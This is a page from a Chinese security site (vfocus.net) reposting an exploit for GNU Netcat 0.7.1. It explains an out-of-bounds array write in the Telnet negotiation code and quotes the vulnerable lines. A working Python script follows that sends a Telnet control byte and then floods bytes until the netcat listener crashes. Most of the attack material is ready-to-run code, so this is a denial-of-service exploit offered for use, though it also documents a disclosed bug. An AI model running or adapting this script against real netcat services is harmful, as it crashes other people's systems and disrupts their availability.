首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 NetCat 0.7.1 - Denial of Service 来源：vfocus.net 作者：n30m1nd 发布时间：2016-12-06   #/usr/bin/python #-*- Coding: utf-8 -*-   ### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ###   # Date: 2016-11-19 # Exploit Author: n30m1nd # Vendor Homepage: http://netcat.sourceforge.net/ # Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download # Version: 0.7.1 # Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux   # Credits # ======= # Props to Giovanni and Armando creators of this useful piece of software, thank you guys! # Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better. See you at AWE!   # How to # ====== # * Get a distribution that ships with gnu netcat or Compile netcat from sources: #       * # Download #       * tar -xzf netcat-0.7.1.tar.gz #       * cd netcat-0.7.1/ #       * ./configure #       * make #       * # Netcat will be deployed in src/netcat # # * Set netcat to listen like the following: #   * ./netcat -nlvp 12347 -T # * Just run this script on a different terminal #   # Why? # ==== # When the Telnet Negotiation is activated (-T option), Netcat parses the incoming packets looking for Telnet Control Codes # by running them through buggy switch/case code. # Aforementioned code fails to safely check for array boundaries resulting in an array out of bounds write.   # Vulnerable code # =============== # telnet.c # ... # 76   static unsigned char getrq[4]; # 77   static int l = 0; # 78   unsigned char putrq[4], *buf = ncsock->recvq.pos; # ... # 88   /* loop all chars of the string */ # 89   for (i = 0; i < ref_size; i++) { # 90     /* if we found IAC char OR we are fetching a IAC code string process it */ # 91     if ((buf[i] != TELNET_IAC) && (l == 0)) # ... #100     getrq[l++] = buf[i]; // BANG! # 99     /* copy the char in the IAC-code-building buffer */ # ... # 76   static unsigned char getrq[4]; # 77   static int l = 0; # 78   unsigned char putrq[4], *buf = ncsock->recvq.pos;   # Exploit code # ============   import socket   RHOST = "127.0.0.1" RPORT = 12347   print("[+] Connecting to %s:%d") % (RHOST, RPORT) s = socket.create_connection((RHOST, RPORT)) s.send("\xFF") # Telnet control character print("[+] Telnet control character sent") print("[i] Starting") try:     i = 0     while True: # Loop until it crashes         i += 1         s.send("\x30") except:     print("[+] GNU Netcat crashed on iteration: %d") % (i)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apache CouchDB 2.0.0 - Local P ·Dup Scout Enterprise 9.1.14 - ·Microsoft MSINFO32.EXE 6.1.760 ·DiskBoss Enterprise 7.4.28 - ' ·Microsoft Event Viewer 1.0 - X ·Linux Kernel 4.4.0 (Ubuntu 14. ·Alcatel Lucent Omnivista 8770 ·Microsoft PowerShell - XML Ext ·Microsoft Windows Media Center ·Microsoft Edge - JSON.parse In ·Microsoft Excel Starter 2010 - ·Microsoft Edge - CMarkup::Ensu   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved